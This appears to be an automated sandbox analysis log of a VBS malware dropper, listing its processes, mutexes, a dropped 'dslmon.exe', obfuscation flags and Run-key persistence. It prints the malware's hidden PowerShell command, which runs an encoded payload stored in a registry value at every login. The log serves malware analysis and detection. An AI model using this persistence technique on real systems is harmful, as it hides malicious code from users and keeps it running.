Source: 26.0.dslmon.exe.bf0000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Security.AccessControl.MutexSecurity System.Threading.Mutex::GetAccessControl()
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Security.AccessControl.MutexSecurity::AddAccessRule(System.Security.AccessControl.MutexAccessRule)
Source: 20.2.dslmon.exe.b60000.0.unpack, Microsoft.Tools.Caspol/caspol.cs Security API names: System.Void System.Threading.Mutex::SetAccessControl(System.Security.AccessControl.MutexSecurity)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{9bd83597-93e4-4366-8889-6a4efb8a5fe8}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: Binary string: caspol.pdbx source: CasPol.exe, 00000010.00000003.266576966136.00000000208A2000.00000004.00000800.00020000.00000000.sdmp, dslmon.exe, 00000014.00000002.266736797377.0000000000B62000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe, 0000001A.00000002.266898010453.0000000000BF2000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe.16.dr
Source: Binary string: caspol.pdb source: dslmon.exe, dslmon.exe, 0000001A.00000002.266898010453.0000000000BF2000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe.16.dr

Data Obfuscation

Source: Yara match File source: 00000010.00000000.266464354998.0000000001300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.268221853538.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.268214047867.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand 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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081ECA74 push eax; mov dword ptr [esp], ecx 10_2_081ECA9C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_082301B8 push eax; mov dword ptr [esp], edx 10_2_082301CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08235399 pushfd ; retf 10_2_0823539F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08230440 push eax; mov dword ptr [esp], edx 10_2_0823053C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08231500 push cs; ret 10_2_08231517
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D1D67 push edx; iretd 10_2_088D1D6B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089BE4DE push esp; ret 10_2_089BE4E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0815C99F push ss; ret 19_2_0815C9B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0815D989 pushad ; retf 19_2_0815D995
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_081B2B17 push eax; mov dword ptr [esp], edx 19_2_081B2B2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_081BCBF0 push es; ret 19_2_081BCC00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845214C pushad ; ret 19_2_0845214D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08562B60 push eax; iretd 19_2_08562B61
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08560FC8 pushad ; ret 19_2_08560FC9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089A78E8 push eax; mov dword ptr [esp], edx 19_2_089A78FC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089ACDF0 push eax; mov dword ptr [esp], edx 19_2_089ACE04
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B470E3 pushad ; ret 25_2_02B470F4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B43F60 push es; ret 25_2_02B43F70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_079603ED push eax; mov dword ptr [esp], edx 25_2_0796044C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08174350 pushfd ; iretd 25_2_08174351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08171FB0 push esp; ret 25_2_08171FB1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_081737E0 push esp; retf 25_2_081737E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08185F40 push eax; mov dword ptr [esp], edx 25_2_08185F6C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03283730 pushad ; iretd 28_2_03283731
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03280A86 push FFFFFF8Bh; retf 28_2_03280A8F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0840EB1F pushfd ; ret 28_2_0840EB21
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_08616FDA push esp; ret 28_2_08616FE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3rumnuxb.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kar5iszo.cmdline

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kxeayl3s.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File created: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\3rumnuxb.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kar5iszo.dll

Boot Survival

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Avel
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DSL Monitor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Avel cmd /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
